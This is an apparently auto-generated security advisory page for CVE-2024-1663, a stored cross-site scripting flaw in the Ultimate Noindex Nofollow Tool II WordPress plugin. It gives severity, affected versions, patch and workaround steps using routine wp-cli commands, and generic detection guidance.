CVE-2024-1663 – This vulnerability in the Ultimate Noindex Nofo... (How to Fix)

Q: What is the severity of CVE-2024-1663?

CVE-2024-1663 has a CVSS score of 4.8 (MEDIUM). This vulnerability in the Ultimate Noindex Nofollow Tool II WordPress plugin allows administrators to inject malicious scripts into plugin settings, which are then executed when other users view affected pages. It affects WordPress sites using this plugin, particularly in multisite configurations where unfiltered_html capability is restricted. Attackers with admin privileges can perform stored cross-site scripting attacks.

📋 TL;DR

This vulnerability in the Ultimate Noindex Nofollow Tool II WordPress plugin allows administrators to inject malicious scripts into plugin settings, which are then executed when other users view affected pages. It affects WordPress sites using this plugin, particularly in multisite configurations where unfiltered_html capability is restricted. Attackers with admin privileges can perform stored cross-site scripting attacks.

💻 Affected Systems

Products:

Ultimate Noindex Nofollow Tool II WordPress Plugin

Versions: All versions before 1.3.6

Operating Systems: All operating systems running WordPress

Default Config Vulnerable: ⚠️ Yes

Notes: Particularly impactful in WordPress multisite setups where unfiltered_html capability is disallowed by default for security.

📦 What is this software?

Ultimate Noindex Nofollow Tool Ii by Texttheater

View all CVEs affecting Ultimate Noindex Nofollow Tool Ii →

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker with compromised admin credentials could inject malicious scripts that steal session cookies, redirect users to phishing sites, or perform actions on behalf of authenticated users across the entire WordPress site.

🟠

Likely Case

Malicious administrator or compromised admin account injects JavaScript payloads that affect other users viewing plugin settings pages, potentially leading to session hijacking or credential theft.

🟢

If Mitigated

With proper access controls and admin account security, impact is limited to authorized administrators who would need to intentionally exploit their own privileges.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires admin-level access. The vulnerability is well-documented with proof-of-concept available through WPScan.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.3.6

Vendor Advisory: https://wpscan.com/vulnerability/6d101f2b-e903-4e64-92cc-e550abb52d6f/

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find 'Ultimate Noindex Nofollow Tool II'. 4. Click 'Update Now' if available, or download version 1.3.6+ from WordPress repository. 5. Activate the updated plugin.

🔧 Temporary Workarounds

Disable vulnerable plugin

all

Temporarily deactivate the plugin until patched version can be installed

wp plugin deactivate ultimate-noindex-nofollow-tool-ii

Restrict admin access

all

Implement strict access controls and monitoring for admin accounts

🧯 If You Can't Patch

Remove admin access from untrusted users and implement multi-factor authentication for all admin accounts
Install a web application firewall with XSS protection rules and monitor for suspicious admin activity

🔍 How to Verify

Check if Vulnerable:

Check plugin version in WordPress admin panel under Plugins → Installed Plugins, or run: wp plugin list --name='ultimate-noindex-nofollow-tool-ii' --field=version

Check Version:

wp plugin list --name='ultimate-noindex-nofollow-tool-ii' --field=version

Verify Fix Applied:

Confirm plugin version is 1.3.6 or higher using same methods as checking vulnerable

📡 Detection & Monitoring

Log Indicators:

Unusual admin activity modifying plugin settings
JavaScript payloads in plugin option updates
Multiple failed admin login attempts followed by successful login

Network Indicators:

Unexpected JavaScript loading from plugin settings pages
Admin panel requests containing script tags or JavaScript functions

SIEM Query:

source="wordpress" AND (event="plugin_updated" OR event="option_updated") AND plugin="ultimate-noindex-nofollow-tool-ii" AND version<"1.3.6"

📊 Metadata

CVE ID: CVE-2024-1663

CVSS v3 Score: 4.8 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.08% exploit probability (24.1th percentile)

Published: May 15, 2025

Last Updated: June 11, 2025

🔗 References

https://wpscan.com/vulnerability/6d101f2b-e903-4e64-92cc-e550abb52d6f/ Exploit,Third Party Advisory
https://wpscan.com/vulnerability/6d101f2b-e903-4e64-92cc-e550abb52d6f/ Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-1663, you might also want to check these: